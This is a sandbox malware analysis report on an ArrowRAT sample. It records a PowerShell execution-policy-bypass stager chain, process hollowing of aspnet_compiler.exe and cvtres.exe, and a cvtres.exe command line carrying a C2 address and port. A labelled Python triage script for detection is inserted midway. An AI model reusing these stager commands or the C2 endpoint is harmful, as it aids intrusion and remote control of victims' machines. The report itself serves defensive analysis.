Malware Analysis Report

2024-10-10 10:15

Sample ID 230519-btk2kaed68
Target 5ff1aded34d5d6f0635f6f9861436886.bin
SHA256 5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc
Tags
arrowrat client rat
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK
    Enterprise Matrix V6
Analysis: static1
    Detonation Overview
    Signatures
Analysis: behavioral1
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files
Analysis: behavioral2
    Detonation Overview
    Command Line
    Signatures
    Processes
    Network
    Files

Analysis Overview

score
10/10

SHA256

5295a4068b1de47c3385bd1608f84ef51b4bb8b6e0f867af7797a199da9378dc

Threat Level: Known bad

The file 5ff1aded34d5d6f0635f6f9861436886.bin was found to be: Known bad.

Malicious Activity Summary

arrowrat client rat

ArrowRat

Checks computer location settings

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-05-19 01:26

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-05-19 01:26

Reported

2023-05-19 01:28

Platform

win7-20230220-en

Max time kernel

31s

Max time network

34s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

Network

N/A

Files

memory/2040-58-0x000000001B290000-0x000000001B572000-memory.dmp

memory/2040-59-0x00000000022E0000-0x00000000022E8000-memory.dmp

memory/2040-60-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-61-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-62-0x00000000028F0000-0x0000000002970000-memory.dmp

memory/2040-69-0x00000000028F0000-0x0000000002970000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 bc56171e5c5e1d408145ec3fc8b3cdc4
SHA1 f22979ca4218867b13c697eecd267991949a0d9d
SHA256 7e835320659002c243a14aa35f98b9b244d6191ec4d1fe05dd75834bf396656b
SHA512 280b322b3a09bc7ed01288c962b180d8436d21eb41d1d8f10f36a2442564b82225b568a9bbf4ba6d84ef8c2b5587230a90004f3ae085708abff195e96691f61b

memory/1328-79-0x000000001B1D0000-0x000000001B4B2000-memory.dmp

memory/1328-80-0x0000000001EC0000-0x0000000001EC8000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/1328-82-0x0000000002754000-0x0000000002757000-memory.dmp

memory/1328-83-0x000000000275B000-0x0000000002792000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-05-19 01:26

Reported

2023-05-19 01:28

Platform

win10v2004-20230220-en

Max time kernel

150s

Max time network

154s

Command Line

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

Signatures

ArrowRat

rat arrowrat

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1675742406-747946869-1029867430-1000\{B05CD583-21C4-4B88-AD2A-A7B36E5F950D} C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1675742406-747946869-1029867430-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3780 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 3780 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 100 wrote to memory of 3832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 100 wrote to memory of 3832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3832 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3832 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3848 wrote to memory of 4568 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3848 wrote to memory of 4568 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4568 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4568 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe
PID 3244 wrote to memory of 3184 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 3244 wrote to memory of 3184 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\abf2dcd61f4a9717e372e32dcfcb02831e51130f4a91fa87bb7954785db435fd.ps1

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\Unlimited\ISO\Binnot.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Binnot.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Binnot.ps1

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\ProgramData\Unlimited\ISO\Unlimited.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Unlimited\ISO\Unlimited.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

PowerShell -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\Unlimited\ISO\Unlimited.ps1

C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe

"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF
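
Added example (not part of the sandbox output): a Python triage script that reads the WriteProcessMemory rows and the cvtres.exe command line reproduced in this behavioral2 section and turns them into the three findings an analyst wants from the report: the script-host chain (powershell -> WScript -> cmd -> powershell), the two children that were written to far more often than process creation explains (aspnet_compiler.exe and cvtres.exe, which together with the "Suspicious use of SetThreadContext" signature in the summary is the process-hollowing pattern), and the C2 endpoint passed on the cvtres.exe command line. The rows and command lines are copied from this page; the PID-to-command-line mapping (3244 = aspnet_compiler.exe, 1620 = cvtres.exe) is inferred from the write targets, the write-count threshold of 4 is an assumption of this example rather than a sandbox-defined value, and the function names are the example's own. Matching keys on lower-cased file names, so the mixed-case "Microsoft.NEt" path in the rows does not break it. The second WScript instance (PID 3848) has no parent in the write table, so it only matches a pattern that starts at wscript.exe. Note also that no connection to 185.252.178.121 appears in the Network table of either run, so the endpoint is a command-line indicator, not an observed connection.

```python
"""Triage helper for the sandbox rows above: rebuild parent->child links from the
WriteProcessMemory table, flag hollowing targets, and extract the C2 endpoint.
Added example; the row format is the report's text layout, not a sandbox API."""
import re
from collections import defaultdict

# Rows copied from the behavioral2 "Suspicious use of WriteProcessMemory" table.
# Each line is one WriteProcessMemory call; repeated lines are repeated calls.
WRITE_ROWS = "\n".join(
    [r"PID 3780 wrote to memory of 100 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe"] * 2
    + [r"PID 100 wrote to memory of 3832 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe"] * 2
    + [r"PID 3832 wrote to memory of 4584 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"] * 2
    + [r"PID 3848 wrote to memory of 4568 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe"] * 2
    + [r"PID 4568 wrote to memory of 1732 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"] * 2
    + [r"PID 1732 wrote to memory of 3244 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"] * 8
    + [r"PID 3244 wrote to memory of 3184 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\explorer.exe"] * 2
    + [r"PID 3244 wrote to memory of 1620 N/A C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe"] * 8
)

# Command lines from the Processes section, keyed by the PID each image was written
# to in the rows above (the PID mapping is inferred here; the report does not list it).
COMMAND_LINES = {
    3244: r'"C:\Windows\Microsoft.NEt\Framework\v4.0.30319\aspnet_compiler.exe"',
    1620: r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 185.252.178.121 1337 qCDAaGyIF',
}

ROW_RE = re.compile(r"^PID (\d+) wrote to memory of (\d+) \S+ (\S+) (\S+)$")
# Argument pattern seen on the hollowed cvtres.exe in this report: Client <ip> <port> <id>
C2_RE = re.compile(r"\bClient (\d{1,3}(?:\.\d{1,3}){3}) (\d{1,5}) (\S+)")

# Ordinary process creation shows up in this table as a couple of writes from parent
# to child. A parent that keeps writing into a child is replacing its image; with the
# SetThreadContext signature that is process hollowing. Threshold is an assumption.
HOLLOW_WRITE_THRESHOLD = 4


def basename(path):
    """Lower-cased file name, so 'Microsoft.NEt' and 'Microsoft.NET' paths compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def parse_writes(text):
    """Return {(src_pid, dst_pid): [src_image, dst_image, write_count]}."""
    edges = {}
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            continue  # ignore anything that is not a write row
        src, dst, src_img, dst_img = m.groups()
        entry = edges.setdefault((int(src), int(dst)), [src_img, dst_img, 0])
        entry[2] += 1
    return edges


def find_hollowing(edges, threshold=HOLLOW_WRITE_THRESHOLD):
    """(src_pid, dst_pid, dst_image, writes) for children written to beyond what
    process creation alone explains."""
    return [(s, d, dst_img, n) for (s, d), (_, dst_img, n) in edges.items()
            if n >= threshold]


def find_chains(edges, pattern=("powershell.exe", "wscript.exe", "cmd.exe", "powershell.exe")):
    """PID chains whose images match `pattern` along parent->child write links."""
    children, images = defaultdict(list), {}
    for (s, d), (src_img, dst_img, _) in edges.items():
        children[s].append(d)
        images[s], images[d] = basename(src_img), basename(dst_img)

    def walk(pid, depth):
        if images.get(pid) != pattern[depth]:
            return []
        if depth == len(pattern) - 1:
            return [[pid]]
        return [[pid] + rest for c in children[pid] for rest in walk(c, depth + 1)]

    return [chain for pid in images for chain in walk(pid, 0)]


def extract_c2(command_lines):
    """{pid: (host, port, client_id)} for every command line carrying the pattern."""
    found = {}
    for pid, cmd in command_lines.items():
        m = C2_RE.search(cmd)
        if m:
            found[pid] = (m.group(1), int(m.group(2)), m.group(3))
    return found


def triage(rows=WRITE_ROWS, command_lines=COMMAND_LINES):
    """Run all three checks over the embedded report rows."""
    edges = parse_writes(rows)
    return {
        "script_chains": find_chains(edges),
        "hollowing": find_hollowing(edges),
        "c2": extract_c2(command_lines),
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(key)
        for item in (value.items() if isinstance(value, dict) else value):
            print("   ", item)
```

Running the script reports one four-stage chain (3780 -> 100 -> 3832 -> 4584), two hollowing targets (aspnet_compiler.exe written 8 times by PID 1732, cvtres.exe written 8 times by PID 3244; explorer.exe, with 2 writes, is not flagged), and the endpoint 185.252.178.121:1337 with client id qCDAaGyIF. The same functions work on rows pulled from a sandbox export or from Sysmon event 8/10 data once they are rendered in the same "PID X wrote to memory of Y" form.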

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 8.3.197.209.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 1.202.248.87.in-addr.arpa udp
US 8.8.8.8:53 84.150.43.20.in-addr.arpa udp
US 8.8.8.8:53 14.103.197.20.in-addr.arpa udp
US 8.8.8.8:53 113.66.64.40.in-addr.arpa udp
US 8.8.8.8:53 250.255.255.239.in-addr.arpa udp
IE 13.69.239.73:443 tcp
US 8.8.8.8:53 1.208.79.178.in-addr.arpa udp
US 8.8.8.8:53 240.232.229.192.in-addr.arpa udp
US 8.8.8.8:53 126.143.241.8.in-addr.arpa udp
US 8.8.8.8:53 240.232.18.117.in-addr.arpa udp
US 8.8.8.8:53 32.134.221.88.in-addr.arpa udp
NL 8.238.20.126:80 tcp
NL 8.238.20.126:80 tcp
NL 8.238.20.126:80 tcp
US 8.8.8.8:53 254.166.241.8.in-addr.arpa udp
US 8.8.8.8:53 42.134.221.88.in-addr.arpa udp
NL 173.223.113.164:443 tcp
US 8.8.8.8:53 9.143.101.95.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl0dbiph.qjs.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3780-133-0x000001FC31060000-0x000001FC31082000-memory.dmp

memory/3780-143-0x000001FC49500000-0x000001FC49510000-memory.dmp

memory/3780-144-0x000001FC49500000-0x000001FC49510000-memory.dmp

C:\ProgramData\Unlimited\ISO\Binnot.vbs

MD5 8444901b66d6f83f3a684f1b44646868
SHA1 69c9c40aef3734959b4ce5f07005bf13c07646f9
SHA256 cfeaafc87ceec9986f37f6a42ecfa39260f98c951404df95da5e074141add5da
SHA512 7493b0d40c9c914c8968b42752b1d14d415e7bccff07f9bf2ab976d77517e12a456f142ee786527c4e536fab3e4156b21ce353f51f5925bbc405937ad7929bbb

C:\ProgramData\Unlimited\ISO\Binnot.bat

MD5 f1d747a7825a5db756d428a5254d244e
SHA1 7db56fe57492bd856c787cd2a836eff4f2ce5e01
SHA256 5863b76caee43b2f1efdd2322f2e5731b1537d1deeb35e860cd75a8304fe4ddf
SHA512 4b1f63df96b8f9e2a381855974b2efab5bd48ae342b1e29a51661d0514ba6f8e62d23e3e58a9a9f978d39880ab03a9b9bf72ab52a546a965da20daa18c4d246d

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 223bd4ae02766ddc32e6145fd1a29301
SHA1 900cfd6526d7e33fb4039a1cc2790ea049bc2c5b
SHA256 1022ec2fed08ff473817fc53893e192a8e33e6a16f3d2c8cb6fd37f49c938e1e
SHA512 648cd3f8a89a18128d2b1bf960835e087a74cdbc783dbfcc712b3cb9e3a2e4f715e534ba2ef81d89af8f60d4882f6859373248c875ceb26ad0922e891f2e74cc

memory/4584-158-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

memory/4584-159-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 27fdb1beb89b56345e585d480be3026b
SHA1 2626e41ca27668518d01c04e1579f77027ff31a1
SHA256 ef8cd66cc241c6d899919ae6f8369334b20202bd4ad49acfa546d29300c533d2
SHA512 bd8208c8763ad8a6c25b6363b8e0e2a3c694e4e0cabfe4ce5d40945bd1f4274b7da976997f825e95c4455bf6b2e20b5bd960609b172f7c70d3521cb2ab24d49a

C:\ProgramData\Unlimited\ISO\Binnot.ps1

MD5 58ef18971b1520648e0c6d67036251ff
SHA1 68bd1ee657ff233f6a1ee453914aaecdeb845284
SHA256 226b14799e579e28954937fa3ffdb7d0e5dcd10360b35c329a7246a23be4b4b3
SHA512 9b7f04aca4b3e2af5aafdc9ea30c1722722d668078bea8b0aaa2394d0cb50ac75716fb9173d4084bd5a9cfaa279bd94404b64c140532daa5b3bdd66842f332d2

memory/4584-171-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

memory/4584-172-0x0000014FDB660000-0x0000014FDB670000-memory.dmp

C:\ProgramData\Unlimited\ISO\Unlimited.vbs

MD5 c281573a4f6f6ac5b06f2e9436400093
SHA1 c2699e56b7c26ac9cdfe1f500b49151b69bd6ad8
SHA256 3c312f2547fbc4a3ffe5c1b6d91c03494d7653fd758d886473f2ae6656de11f7
SHA512 76aed1be4b48d2fc019c9136eb74b3a96b56b89c74cb3b3347f8eefc592fee24a2a94ea3babd4b394080c7663864781c89afe761e59f8d65aed147d1ed422026

C:\ProgramData\Unlimited\ISO\Unlimited.bat

